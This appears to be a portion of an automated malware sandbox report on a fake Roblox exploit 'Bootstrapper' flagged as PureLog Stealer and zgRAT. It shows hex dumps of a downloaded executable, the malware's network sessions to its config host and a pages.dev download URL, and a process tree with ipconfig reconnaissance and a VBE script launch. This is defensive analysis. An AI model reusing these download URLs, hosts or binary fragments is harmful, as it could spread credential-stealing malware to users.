2024-11-14 03:52:41 UTC	373	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 1b 15 35 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 76 0c 00 00 08 00 00 00 00 00 00 8a 94 0c 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0c 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd5g"v @ `
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 74 0c 00 00 20 00 00 00 76 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 75 05 00 00 00 a0 0c 00 00 06 00 00 00 78 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0c 00 00 02 00 00 00 7e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 48 00 00 00 02 00 05 00 b8 13 05 00 7c 80 07 00 01 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 52 00 00 00 00 00 00 00 28 04 00 00 06 3a 01 00 00 00 2a 72 01 00 00 70 28 02 00 00 06 72 1d 00 00 70 6f 01 00 00 0a 3a Data Ascii: H.textt v `.rsrcux@@.reloc~@BH\|0R(:*rp(rpo:
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 28 2b 00 00 0a 13 15 11 14 72 a2 06 00 70 28 2b 00 00 0a 13 16 11 14 28 31 00 00 0a 39 18 00 00 00 11 15 28 1a 00 00 0a 39 0c 00 00 00 11 16 28 1a 00 00 0a 3a 0e 00 00 00 11 0d 11 0b 28 1a 00 00 06 38 0b 00 00 00 11 14 11 0b 11 0d 28 0e 00 00 06 11 14 28 11 00 00 06 20 f4 01 00 00 28 2c 00 00 0a 16 28 32 00 00 0a 2a 41 c4 00 00 02 00 00 00 24 00 00 00 11 00 00 00 35 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 1e 00 00 00 29 00 00 00 47 00 00 00 08 00 00 00 19 00 00 01 02 00 00 00 6c 00 00 00 11 00 00 00 7d 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 66 00 00 00 29 00 00 00 8f 00 00 00 08 00 00 00 19 00 00 01 02 00 00 00 cd 00 00 00 4a 00 00 00 17 01 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 16 00 00 00 15 01 00 00 2b 01 00 00 06 00 00 00 19 00 00 01 00 Data Ascii: (+rp(+(19(9(:(8(( (,(2*A$5)Gl}f)J+
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 00 0a 25 72 3a 09 00 70 04 72 62 09 00 70 28 2a 00 00 0a 6f 3d 00 00 0a 25 17 6f 07 00 00 0a 28 3e 00 00 0a 26 16 28 32 00 00 0a 17 2a 72 86 09 00 70 28 16 00 00 0a 16 2a 01 10 00 00 02 00 52 00 1c 6e 00 0d 00 00 00 00 13 30 02 00 45 00 00 00 00 00 00 00 72 c0 09 00 70 28 16 00 00 0a 20 f4 01 00 00 28 2c 00 00 0a 02 72 0c 0a 00 70 28 2b 00 00 0a 28 0c 00 00 06 02 72 20 0a 00 70 28 2b 00 00 0a 28 0c 00 00 06 02 72 32 0a 00 70 28 2b 00 00 0a 28 0c 00 00 06 2a 00 00 00 01 04 00 00 4e 02 28 31 00 00 0a 3a 07 00 00 00 02 28 3f 00 00 0a 26 2a 13 30 01 00 4c 00 00 00 00 00 00 00 72 42 0a 00 70 28 16 00 00 0a 20 f4 01 00 00 28 2c 00 00 0a 28 17 00 00 06 3a 0f 00 00 00 72 90 0a 00 70 28 16 00 00 0a 28 18 00 00 06 28 15 00 00 06 3a 14 00 00 00 72 c0 0a 00 70 28 16 Data Ascii: %r:prbp(o=%o(>&(2rp(Rn0Erp( (,rp(+(r p(+(r2p(+(N(1:(?&*0LrBp( (,(:rp(((:rp(
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 01 10 00 00 02 00 16 00 0d 23 00 0d 00 00 00 00 1b 30 18 00 7f 00 00 00 12 00 00 11 73 09 00 00 0a 25 73 3b 00 00 0a 25 72 40 06 00 70 6f 3c 00 00 0a 25 72 e5 0f 00 70 6f 3d 00 00 0a 25 17 6f 06 00 00 0a 25 16 6f 07 00 00 0a 25 17 6f 08 00 00 0a 6f 0a 00 00 0a 25 6f 0b 00 00 0a 26 25 6f 0c 00 00 0a 6f 0d 00 00 0a 0a 6f 35 00 00 0a 06 28 0e 00 00 0a 3a 10 00 00 00 06 72 eb 0f 00 70 6f 4b 00 00 0a 38 01 00 00 00 16 0b dd 08 00 00 00 26 16 0b dd 00 00 00 00 07 2a 00 01 10 00 00 00 00 00 00 75 75 00 08 21 00 00 01 1b 30 06 00 51 00 00 00 13 00 00 11 72 ef 0f 00 70 0a 28 49 00 00 0a 72 65 10 00 70 28 2b 00 00 0a 0b 73 17 00 00 0a 0c 08 06 07 6f 3a 00 00 0a dd 0d 00 00 00 08 39 06 00 00 00 08 6f 10 00 00 0a dc 72 91 10 00 70 72 a1 10 00 70 07 72 ab 10 00 70 28 Data Ascii: #0s%s;%r@po<%rpo=%o%o%oo%o&%ooo5(:rpoK8&*uu!0Qrp(Irep(+so:9orprprp(
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 00 00 11 03 3a 0b 00 00 00 72 22 14 00 70 73 5f 00 00 0a 7a 03 6f 60 00 00 0a 0a 06 3a 06 00 00 00 7e 5d 00 00 0a 2a 06 7e 19 00 00 04 58 0b 16 0c 38 12 00 00 00 07 07 1d 62 03 08 6f 61 00 00 0a 61 58 0b 08 17 58 0c 08 03 6f 60 00 00 0a 32 e5 07 07 1f 11 63 59 0b 07 07 1f 0b 63 59 0b 07 07 1b 63 59 0b 02 7b 1b 00 00 04 07 02 7b 1c 00 00 04 5f a3 1b 01 00 02 0d 38 2c 00 00 00 09 7b 91 04 00 04 07 40 19 00 00 00 09 7b 90 04 00 04 03 1a 6f 62 00 00 0a 39 07 00 00 00 09 7b 90 04 00 04 2a 09 7b 92 04 00 04 0d 09 2d d1 02 03 07 28 2e 00 00 06 2a 00 01 04 00 00 13 30 05 00 53 00 00 00 18 00 00 11 04 02 7b 1c 00 00 04 5f 0a 03 04 02 7b 1b 00 00 04 06 a3 1b 01 00 02 73 2f 0e 00 06 0b 02 7b 1b 00 00 04 06 07 a4 1b 01 00 02 02 02 7b 1a 00 00 04 0c 08 17 58 7d 1a 00 Data Ascii: :r"ps_zo`:~]~X8boaaXXo`2cYcYcY{{_8,{@{ob9{{-(.*0S{_{s/{{X}
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 00 00 04 17 3b 16 00 00 00 02 28 76 00 00 0a 3a 0d 00 00 00 02 28 77 00 00 0a 3a 02 00 00 00 03 2a 04 18 40 13 00 00 00 0e 04 39 06 00 00 00 7e 3c 00 00 04 2a 72 32 14 00 70 2a 0f 03 28 78 00 00 0a 03 0f 03 28 78 00 00 0a 28 2a 00 00 0a 2a 00 00 01 04 00 00 62 02 0f 00 72 2e 14 00 70 28 38 00 00 0a 28 79 00 00 0a 28 6b 00 00 06 2a 00 00 00 86 02 02 0f 00 72 2e 14 00 70 28 38 00 00 0a 28 79 00 00 0a 28 6b 00 00 06 03 04 05 28 68 00 00 06 2a 00 00 13 30 02 00 4e 00 00 00 00 00 00 00 02 28 77 00 00 0a 3a 35 00 00 00 02 28 76 00 00 0a 3a 2a 00 00 00 03 1f 2e 28 10 06 00 06 15 40 1c 00 00 00 03 1f 45 28 10 06 00 06 15 40 0e 00 00 00 03 1f 65 28 10 06 00 06 15 3b 02 00 00 00 03 2a 03 72 3a 14 00 70 28 03 00 00 0a 2a 00 00 01 04 00 00 72 02 1f 2e 28 10 06 00 06 Data Ascii: ;(v:(w:@9~<r2p(x(x(br.p(8(y(kr.p(8(y(k(h0N(w:5(v:.(@E(@e(;r:p(r.(
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 00 1a 36 00 0d 00 00 00 00 26 02 14 14 28 8c 00 00 06 2a 00 00 26 02 14 03 28 8c 00 00 06 2a 00 00 26 02 03 14 28 8c 00 00 06 2a 00 00 22 02 14 28 04 00 00 2b 2a 00 00 00 1e 02 28 05 00 00 2b 2a 22 02 04 28 04 00 00 2b 2a 00 00 00 5e 02 d0 0c 00 00 1b 28 87 00 00 0a 03 28 8b 00 00 06 a5 0c 00 00 1b 2a 5e 02 d0 0d 00 00 1b 28 87 00 00 0a 03 28 8c 00 00 06 a5 0d 00 00 1b 2a 13 30 06 00 29 00 00 00 24 00 00 11 04 39 07 00 00 00 04 8e 3a 06 00 00 00 14 38 0c 00 00 00 73 f5 01 00 06 25 04 6f bf 01 00 06 0a 02 03 06 28 8c 00 00 06 2a 00 00 00 01 04 00 00 1b 30 07 00 4d 00 00 00 25 00 00 11 02 72 67 15 00 70 28 2d 06 00 06 04 28 9e 01 00 06 0a 06 6f 99 01 00 06 3a 07 00 00 00 06 17 6f 98 01 00 06 02 73 88 00 00 0a 73 2e 02 00 06 0b 06 07 03 6f a6 01 00 06 0c dd Data Ascii: 6&(&(&("(+(+"(+^((^((0)$9:8s%o(*0M%rgp(-(o:oss.o
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 00 00 04 2a 22 02 03 7d 44 00 00 04 2a 00 00 00 56 02 28 5b 00 00 0a 02 17 28 b7 00 00 06 02 17 28 b9 00 00 06 2a 00 00 1e 02 28 5b 00 00 0a 2a 1e 02 28 5a 00 00 0a 2a 1e 02 7b 45 00 00 04 2a 22 02 03 7d 45 00 00 04 2a 00 00 00 32 02 7c 46 00 00 04 28 92 00 00 0a 2a 00 00 00 36 02 03 73 93 00 00 0a 7d 46 00 00 04 2a 00 00 32 02 7c 48 00 00 04 28 94 00 00 0a 2a 00 00 00 36 02 03 73 95 00 00 0a 7d 48 00 00 04 2a 00 00 32 02 7c 47 00 00 04 28 96 00 00 0a 2a 00 00 00 36 02 03 73 97 00 00 0a 7d 47 00 00 04 2a 00 00 1e 02 28 54 00 00 06 2a 3a 02 28 54 00 00 06 02 03 28 bf 00 00 06 2a 00 22 02 03 28 55 00 00 06 2a 00 00 00 8a 02 03 7d 4f 00 00 04 02 03 28 cc 00 00 06 7d 52 00 00 04 02 15 7d 50 00 00 04 02 14 7d 51 00 00 04 2a 00 13 30 04 00 44 00 00 00 2d 00 00 Data Ascii: "}DV([((([(Z{E"}E2\|F(6s}F2\|H(6s}H2\|G(6s}G(T:(T("(U}O(}R}P}Q*0D-
2024-11-14 03:52:41 UTC	1369	IN	Data Raw: 00 00 00 36 02 03 73 69 00 00 0a 7d 5d 00 00 04 2a 00 00 32 02 7c 5b 00 00 04 28 64 00 00 0a 2a 00 00 00 36 02 03 73 65 00 00 0a 7d 5b 00 00 04 2a 00 00 1e 02 28 5b 00 00 0a 2a 3a 02 28 5b 00 00 0a 02 03 28 e9 00 00 06 2a 00 66 03 28 06 00 00 2b 25 3a 0c 00 00 00 26 02 6f 1e 01 00 06 28 3b 04 00 06 2a 00 00 13 30 05 00 3f 00 00 00 30 00 00 11 12 00 28 b1 00 00 0a 7d b7 04 00 04 12 00 02 7d b8 04 00 04 12 00 03 7d b9 04 00 04 12 00 15 7d b6 04 00 04 12 00 7c b7 04 00 04 12 00 28 07 00 00 2b 12 00 7c b7 04 00 04 28 b3 00 00 0a 2a 00 01 04 00 00 13 30 05 00 3f 00 00 00 31 00 00 11 12 00 28 b1 00 00 0a 7d b2 04 00 04 12 00 02 7d b3 04 00 04 12 00 03 7d b4 04 00 04 12 00 15 7d b1 04 00 04 12 00 7c b2 04 00 04 12 00 28 08 00 00 2b 12 00 7c b2 04 00 04 28 b3 00 Data Ascii: 6si}]2\|[(d6se}[([:([(f(+%:&o(;0?0(}}}}\|(+\|(*0?1(}}}}\|(+\|(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	104.21.93.27	443	7772	C:\Users\user\Desktop\BootstrapperV1.23.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 03:52:45 UTC	81	OUT	GET /asset/discord.json HTTP/1.1 Host: getsolara.dev Connection: Keep-Alive
2024-11-14 03:52:45 UTC	1016	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 03:52:45 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: W/"7d966f73b6ce74a610dddaf0d0951ed8" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cytjf7fEBzGz%2FWSyHwHcpq5ckCfHYeucLRxfyVBR8TehC09ZjaKXUizVnsCnC3%2Fn8YVLTukw2QeqQhI6AxKX8AljJY1Oei5VpXA7AyhkYVkccERHBZcoFhHklvRqJMQW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8e240cf2def645f0-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=967&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2811&recv_bytes=695&delivery_rate=2811650&cwnd=251&unsent_bytes=0&cid=6673358b4b84b8dc&ts=250&x=0"
2024-11-14 03:52:45 UTC	109	IN	Data Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 38 50 67 73 70 52 59 41 51 75 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a Data Ascii: 67{ "args" : { "code" : "8PgspRYAQu" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
2024-11-14 03:52:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49735	104.21.93.27	443	7772	C:\Users\user\Desktop\BootstrapperV1.23.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 03:52:45 UTC	56	OUT	GET /api/endpoint.json HTTP/1.1 Host: getsolara.dev
2024-11-14 03:52:46 UTC	1023	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 03:52:46 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: W/"f6b52a565df2f13c59cdfa7bdef89298" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NA546eIK5A1aFhZRAkGqL7LX18ia1VEN1kYzz0Q%2FMdForK4%2BXYaFEQrNEug7ha3326sNMfn0vGWoItECK5F%2BaesVPdv1KGFD93k59VQPLRQfR%2FR52nR8Rd%2Fk7gsnOD3O"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Strict-Transport-Security: max-age=0 Server: cloudflare CF-RAY: 8e240cf7c8a5e7f7-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2070&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2812&recv_bytes=694&delivery_rate=1360902&cwnd=251&unsent_bytes=0&cid=479d3af8aff39a7c&ts=187&x=0"
2024-11-14 03:52:46 UTC	346	IN	Data Raw: 32 31 63 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 33 32 66 33 36 61 63 39 34 34 62 33 34 39 31 33 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 32 38 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 34 64 33 38 61 31 65 63 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73 Data Ascii: 21c{ "BootstrapperVersion": "1.23", "SupportedClient": "version-32f36ac944b34913", "SoftwareVersion": "3.128", "BootstrapperUrl": "https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
2024-11-14 03:52:46 UTC	201	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 34 66 33 61 34 65 65 34 66 65 30 63 37 63 37 36 61 30 65 36 39 34 30 36 36 61 35 64 33 62 33 61 36 37 37 66 31 32 35 39 65 35 62 33 33 30 35 32 66 65 66 35 36 37 37 39 66 36 36 34 35 32 34 32 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 20 75 70 64 61 74 65 64 22 0a 7d 0d 0a Data Ascii: :"https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"4f3a4ee4fe0c7c76a0e694066a5d3b3a677f1259e5b33052fef56779f6645242", "Changelog":"[+] updated"}
2024-11-14 03:52:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	128.116.123.3	443	7772	C:\Users\user\Desktop\BootstrapperV1.23.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 03:52:47 UTC	119	OUT	GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1 Host: clientsettings.roblox.com Connection: Keep-Alive
2024-11-14 03:52:48 UTC	576	IN	HTTP/1.1 200 OK content-length: 119 content-type: application/json; charset=utf-8 date: Thu, 14 Nov 2024 03:52:47 GMT server: Kestrel cache-control: no-cache strict-transport-security: max-age=3600 x-frame-options: SAMEORIGIN roblox-machine-id: 02019703-c9ed-3c78-7997-1f5f4fa37fcd x-roblox-region: us-central_rbx x-roblox-edge: fra2 report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1} connection: close
2024-11-14 03:52:48 UTC	119	IN	Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 31 2e 30 2e 36 35 31 30 38 33 33 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 33 32 66 33 36 61 63 39 34 34 62 33 34 39 31 33 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 35 31 30 38 33 33 22 7d Data Ascii: {"version":"0.651.0.6510833","clientVersionUpload":"version-32f36ac944b34913","bootstrapperVersion":"1, 6, 0, 6510833"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49737	104.20.23.46	443	7772	C:\Users\user\Desktop\BootstrapperV1.23.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 03:52:50 UTC	99	OUT	GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1 Host: www.nodejs.org Connection: Keep-Alive
2024-11-14 03:52:51 UTC	497	IN	HTTP/1.1 307 Temporary Redirect Date: Thu, 14 Nov 2024 03:52:51 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: close Cache-Control: public, max-age=0, must-revalidate location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi strict-transport-security: max-age=31536000; includeSubDomains; preload x-vercel-id: cle1::5t86g-1731556371150-9c15bb99a859 CF-Cache-Status: DYNAMIC X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 8e240d15c9ca6c82-DFW
2024-11-14 03:52:51 UTC	20	IN	Data Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a Data Ascii: fRedirecting...
2024-11-14 03:52:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	22:52:32
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\KKjubdmzCR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KKjubdmzCR.exe"
Imagebase:	0x400000
File size:	4'257'792 bytes
MD5 hash:	75077730D0B0CC562F277D943F68E20A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1824505943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:52:33
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\Bootstrapper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Bootstrapper.exe"
Imagebase:	0x163873d0000
File size:	819'200 bytes
MD5 hash:	2A4DCF20B82896BE94EB538260C5FB93
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 63%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:52:33
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:52:34
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Bootstrapper.exe"
Imagebase:	0xe00000
File size:	2'012'853 bytes
MD5 hash:	2DD40499F44DE86BB908734ECF206C6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1817989346.00000000071B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1817467071.00000000071B4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.1816251543.00000000068AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:52:35
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /c ipconfig /all
Imagebase:	0x7ff6c9280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:52:35
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:52:35
Start date:	13/11/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff6d2b30000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:52:35
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\monitordll\2mpoFrNBWk.vbe"
Imagebase:	0x220000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:52:42
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\BootstrapperV1.23.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\BootstrapperV1.23.exe" --oldBootstrapper "C:\Users\user\Desktop\Bootstrapper.exe" --isUpdate true
Imagebase:	0x1907b950000
File size:	819'200 bytes
MD5 hash:	02C70D9D6696950C198DB93B7F6A835E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:52:43
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:52:43
Start date:	13/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd" /c ipconfig /all
Imagebase:	0x7ff6c9280000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 7848, Parent PID: 7840

General

Target ID:	11
Start time:	22:52:43
Start date:	13/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:52:43
Start date:	13/11/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff6d2b30000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:52:50
